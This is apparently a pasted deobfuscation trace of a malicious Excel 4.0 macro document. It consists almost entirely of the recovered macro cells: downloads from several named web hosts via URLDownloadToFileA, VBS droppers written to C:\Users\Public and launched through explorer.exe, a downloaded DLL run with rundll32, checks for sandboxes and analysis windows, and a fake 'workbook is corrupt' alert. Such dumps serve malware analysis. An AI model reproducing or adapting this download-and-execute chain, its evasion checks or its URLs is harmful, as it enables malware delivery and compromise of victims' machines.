- CELL:HO38093 , FullEvaluation , IF(R38091C223<40000,,GOTO(R38104C223))
- CELL:HO38094 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
- CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
- CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
- CELL:HO38097 , FullEvaluation , [FALSE]
- CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
- CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
- CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
- CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:IE49834 , FullEvaluation , [FALSE] GOTO(R142C133)
- CELL:EC142 , FullEvaluation , "=""C:\Users\Public\UWvo.html"""
- CELL:EC143 , FullEvaluation , "=""C:\Users\Public\VEu7ojib.vbs"""
- CELL:EC144 , FullEvaluation , "=FOPEN(R35703C82,3)"
- CELL:EC145 , FullEvaluation , "=FWRITELN(R35704C82,""h8xNMAA = """"https://wireborg.com/wp-keys.php"""""")"
- CELL:EC146 , FullEvaluation , "=FWRITELN(R35704C82,""MG8 = """"http://zmedia.shwetech.com/wp-keys.php"""""")"
- CELL:EC147 , FullEvaluation , "=FWRITELN(R35704C82,""LPDuR4W = """"https://datalibacbi.ml/wp-keys.php"""""")"
- CELL:EC148 , FullEvaluation , "=FWRITELN(R35704C82,""MhTSF = """"https://procacardenla.ga/wp-keys.php"""""")"
- CELL:EC149 , FullEvaluation , "=FWRITELN(R35704C82,""PXqk = Array(h8xNMAA,MG8,LPDuR4W,MhTSF)"")"
- CELL:EC150 , FullEvaluation , "=FWRITELN(R35704C82,""Dim BicuZ: Set BicuZ = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
- CELL:EC151 , FullEvaluation , "=FWRITELN(R35704C82,""Function WuZErsim(data):"")"
- CELL:EC152 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.setOption(2) = 13056"")"
- CELL:EC153 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.Open """"GET"""", data, False"")"
- CELL:EC154 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
- CELL:EC155 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.Send"")"
- CELL:EC156 , FullEvaluation , "=FWRITELN(R35704C82,""WuZErsim = BicuZ.Status"")"
- CELL:EC157 , FullEvaluation , "=FWRITELN(R35704C82,""End Function"")"
- CELL:EC158 , FullEvaluation , "=FWRITELN(R35704C82,""For Each LS5TrmD in PXqk"")"
- CELL:EC159 , FullEvaluation , "=FWRITELN(R35704C82,""If WuZErsim(LS5TrmD) = 200 Then"")"
- CELL:EC160 , FullEvaluation , "=FWRITELN(R35704C82,""Dim eGo: Set eGo = CreateObject(""""ADODB.Stream"""")"")"
- CELL:EC161 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Open"")"
- CELL:EC162 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Type = 1"")"
- CELL:EC163 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Write BicuZ.ResponseBody"")"
- CELL:EC164 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.SaveToFile """"""&R35702C82&"""""", 2"")"
- CELL:EC165 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Close"")"
- CELL:EC166 , FullEvaluation , "=FWRITELN(R35704C82,""Exit For"")"
- CELL:EC167 , FullEvaluation , "=FWRITELN(R35704C82,""End If"")"
- CELL:EC168 , FullEvaluation , "=FWRITELN(R35704C82,""Next"")"
- CELL:EC169 , FullEvaluation , "=FCLOSE(R35704C82)"
- CELL:EC170 , FullEvaluation , "=EXEC(""explorer.exe ""&R35703C82&"""")"
- CELL:EC171 , FullEvaluation , "=WHILE(ISERROR(FILES(R35702C82)))"
- CELL:EC172 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
- CELL:EC173 , FullEvaluation , "=NEXT()"
- CELL:EC174 , FullEvaluation , "=FILE.DELETE(R35703C82)"
- CELL:EC175 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
- CELL:EC176 , FullEvaluation , "=""C:\Users\Public\xD9fZh.vbs"""
- CELL:EC177 , FullEvaluation , "=FOPEN(R35736C82,3)"
- CELL:EC178 , FullEvaluation , "=""rundll32.exe"""
- CELL:EC179 , FullEvaluation , "=R35702C82&"",DllRegisterServer"""
- CELL:EC180 , FullEvaluation , "=""C:\Windows\System32"""
- CELL:EC181 , FullEvaluation , "=FWRITELN(R35737C82,""Set H6snW = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
- CELL:EC182 , FullEvaluation , "=FWRITELN(R35737C82,""H6snW.Document.Application.ShellExecute """"""&R35738C82&"""""",""""""&R35739C82&"""""",""""""&R35740C82&"""""",Null,0"")"
- CELL:EC183 , FullEvaluation , "=FCLOSE(R35737C82)"
- CELL:EC184 , FullEvaluation , "=EXEC(""explorer.exe ""&R35736C82&"""")"
- CELL:EC185 , FullEvaluation , "=GOTO(R49803C239)"
- CELL:EC186 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
- CELL:HE8688 , FullEvaluation , FORMULA("=FORMULA(R[-8547]C[-80],R[27013]C[-131])",jdOsRgCP7ufKCKrN6H$CD$35702)
- CELL:HE8733 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
- CELL:HE8733 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
- CELL:II24421 , FullEvaluation , "=CLOSE(FALSE)"
- CELL:II24422 , FullEvaluation , "=APP.MAXIMIZE()"
- CELL:II24423 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R49803C239),)"
- CELL:II24424 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R49803C239))"
- CELL:II24425 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R49803C239),)"
- CELL:II24426 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R49803C239),)"
- CELL:II24427 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)"
- CELL:II24428 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)"
- CELL:II24429 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R49803C239))"
- CELL:IE49813 , FullEvaluation , [FALSE] GOTO(R49803C239)
- CELL:IE49803 , End , CLOSE(FALSE)
- [END of Deobfuscation]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement